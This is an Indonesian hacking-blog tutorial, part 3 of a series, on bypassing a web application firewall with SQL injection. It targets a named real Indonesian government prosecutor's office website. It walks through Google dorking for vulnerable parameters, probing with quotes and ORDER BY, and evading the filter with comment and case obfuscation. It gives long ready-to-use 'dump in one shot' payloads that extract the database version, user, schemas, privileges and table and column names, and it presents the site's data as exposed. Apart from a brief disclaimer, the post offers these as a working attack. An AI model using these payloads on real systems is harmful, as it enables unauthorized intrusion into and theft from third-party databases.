Beranda
DEFACE
HACKING

SQL Injection bypass waf ( 403 Forbidden ) #3

3 minute read

sql bypass waf ( 403 Forbidden )
sql bypass

Tutorial SQL Injection bypass waf ( 403 Forbidden ) part 3

Perhatian: Tutorial pada halaman ini hanyalah pembelajaran semata, jika anda menerapkan tutorial pada halaman ini untuk sebuah penyerangan jangan salahkan saya, saya tidak akan bertanggung jawab atas apa yang anda lakukan nantinya, karena halaman ini tidak menyarankan anda untuk melakukan hal buruk pada website yang anda inject

Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya memberikan tutorial SQL Injection.

Target website yang bakalan inject: 
https://kejari-siak.kejaksaan.go.id/
Nah untuk parameter buat injectnya tinggal disearch aja di google, caranya? Ketik pada kolom pencarian google.
site:urlwebsite.com .php?=
mencari parameter
mencari parameter


Nah kalo udah dapat parameternya coba ketik tanda ' diurl lalu tekan enter, contoh. 


https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'

error 403 Forbidden
error

Nah, saat saya kasi tanda ' halamannya jadi berubah, atau muncul error, brarti webnya vuln sql injection, klo udh gitu kasi tanda --+- atau -- -, contoh.


https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'--+-


Nah kalo ngga kembali ke home, kalian hapus aja tanda ' , contoh


https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1--+-

Nahkan kembali ke home, kalo gitu lanjut ke langkah selanjutnya yaitu memasukan query order by atau sejenisnya seperti group by, oke langsung aja kelangkah selanjutnya. 


https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'+order+by+1--+- NORMAL
https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'+order+by+2--+- NORMAL
https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'+order+by+3--+- NORMAL
https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'+order+by+4--+- NORMAL
https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'+order+by+5--+- NORMAL
https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=1'+order+by+6--+- ERROR

ternyata jumlah kolomnya ada 5,sesuai query yg dimasukan, karena Errornya diangka 6 berarti jumlah kolomnya ada 5,oke langkah selanjutnya adalah memasukan query union select untuk mengetahui angka togelnya sekaligus menambahkan tanda - dibelakang angka parameter, contoh. 

https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=-1'+union+select+1,2,3,4,5,6,7--+-

sql bypass waf ( 403 Forbidden )
sql bypass


Disini kita ditampilakan kata "Forbidden" nah untuk mengatasinya perlu kita bypass coba ubah 

+union+select+
Menjadi 

+And .0union/**/distinctrow select/**/distinctrow+

Oke disini kita ditampilkan bahwa terdapat angka togelnya, seperti query diatas bahwa jumlah angka 1 sampai 5 tergantung jumlah Kolomnya hugs, jadi kalo jumlah kolomnya ada 100 berarti saat query union select 1 sampai 100, oke disini angka togelnya sudah muncul, jadi tinggal tempel aja dios sqli anda sesuai angka yang muncul pada halaman di url query union select, contoh.


https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=-1+And%20.0union/**/distinctrow%20select/**/distinctrow+1,2,concat(0x223e273e3c2f7469746c653e,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e3c623e496e6a656374656420627920%20,0x4d722058202d2054776f2047616e73202626202e2f4e616e615f43616e73,0x3c2f623e3c2f666f6e743e3c62723e3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x55736572203a3a20,user(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x3c62723e,0x546f74616c206461746162617365203a3a20,0x3c62723e,(select(@w)from(select (@w:=0x00)%20,(select(@w)from(information_schema.schemata)where(@w)IN(@w:=concat (0x20,@w,0x3c666f6e7420636f6c6f723d22726564223e3e203c2f666f6e743e,schema_name,0x3c62723e))))w),0x3c62723e,0x3c62723e,0x557365722070726976696c656765203a3a20,(select(@z)from(select(@z:=0x00)%20,(select(@z)from(information_schema.user_privileges)where(@z)IN(@z:=concat (0x20,@z,0x3c666f6e7420636f6c6f723d22726564223e7e3e203c2f666f6e743e,grantee,0x202d3e20,Is_grantable,0x3c62723e))))z),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c666f6e7420636f6c6f723d22696e6469676f223e3c7e20536861646f77205365637572652053797374656d207e3e3c2f666f6e743e3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,table_name,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,column_name))))x)),4,5--+-

Tetapi disini kita di tampilkan kembali "Forbidden" kenapa terjadi begitu?, coba kita bypass diosnya.

https://kejari-siak.kejaksaan.go.id/newsdetail.php?id=-1+And%20.0union/**/distinctrow%20select/**/distinctrow+1,2,/*!50000cOncat/**ShadowSecureSystem**/*/(0x223e273e3c2f7469746c653e,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e3c623e496e6a656374656420627920%20,0x4d722058202d2054776f2047616e73202626202e2f4e616e615f43616e73,0x3c2f623e3c2f666f6e743e3c62723e3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,0x56657273696f6e203a3a20,/*!50000VerSiOn/**ShadowSecureSystem**/*/(),0x3c62723e,0x55736572203a3a20,/*!50000UsEr/**ShadowSecureSystem**/*/(),0x3c62723e,0x4461746162617365203a3a20,/*!50000DaTabaSe/**ShadowSecureSystem**/*/(),0x3c62723e,0x3c62723e,0x546f74616c206461746162617365203a3a20,0x3c62723e,(SeLECT(@w)/*!50000FrOM/**ShadowSecureSystem**/*/(/*!50000SeLECT/**ShadowSecureSystem**/*/(@w:=0x00)%20,(SeLECT(@w)/*!50000FrOM/**ShadowSecureSystem**/*/(/*!50000InFOrMATIoN_SChEmA/**ShadowSecureSystem**/*/.SCheMaTA)/*!50000WhErE/**ShadowSecureSystem**/*/(@w)IN(@w:=/*!50000CoNCaT/**ShadowSecureSystem**/*/(0x20,@w,0x3c666f6e7420636f6c6f723d22726564223e3e203c2f666f6e743e,/*!50000sCheMa_NaMe/**ShadowSecureSystem**/*/,0x3c62723e))))w),0x3c62723e,0x3c62723e,0x557365722070726976696c656765203a3a20,(SeLECT(@z)/*!50000FrOM/**ShadowSecureSystem**/*/(/*!50000SeLECT/**ShadowSecureSystem**/*/(@z:=0x00)%20,(SeLECT(@z)/*!50000FrOM/**ShadowSecureSystem**/*/(/*!50000INFOrmATiON_SChEmA/**ShadowSecureSystem**/*/.UsER_PRIViLEgES)/*!50000WhERE/**ShadowSecureSystem**/*/(@z)IN(@z:=/*!50000CoNCaT/**ShadowSecureSystem**/*/(0x20,@z,0x3c666f6e7420636f6c6f723d22726564223e7e3e203c2f666f6e743e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c666f6e7420636f6c6f723d22696e6469676f223e3c7e20536861646f77205365637572652053797374656d207e3e3c2f666f6e743e3c62723e,(selEct(@x)/*!50000fRom/**ShadowSecureSystem**/*/(/*!50000sElect/**ShadowSecureSystem**/*/(@x:=0x00),(sElect(0)/*!From/**ShadowSecureSystem**/*/(/*!50000inforMation_schEma.coLuMns/**ShadowSecureSystem**/*/)/*!50000Where/**ShadowSecureSystem**/*/(taBle_schema=/*!50000DatAbase/**ShadowSecureSystem*/*/())and(0x00)in(@x:=/*!50000coNcat/**ShadowSecureSystem**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**ShadowSecureSystem**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**ShadowSecureSystem**/*/))))x)),4,5--+-

Nah berikut adalah tampilan halaman saat di execute.


sql bypass waf ( 403 Forbidden )
sql bypass


Jika masih tidak paham, anda bisa menonton video dibawah. 


Nahkan isi databasenya muncul, okelah sekian tutorial sql injection bypass waf ( not acceptable ) pada halaman ini, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum. 

Baca juga :

Posting Komentar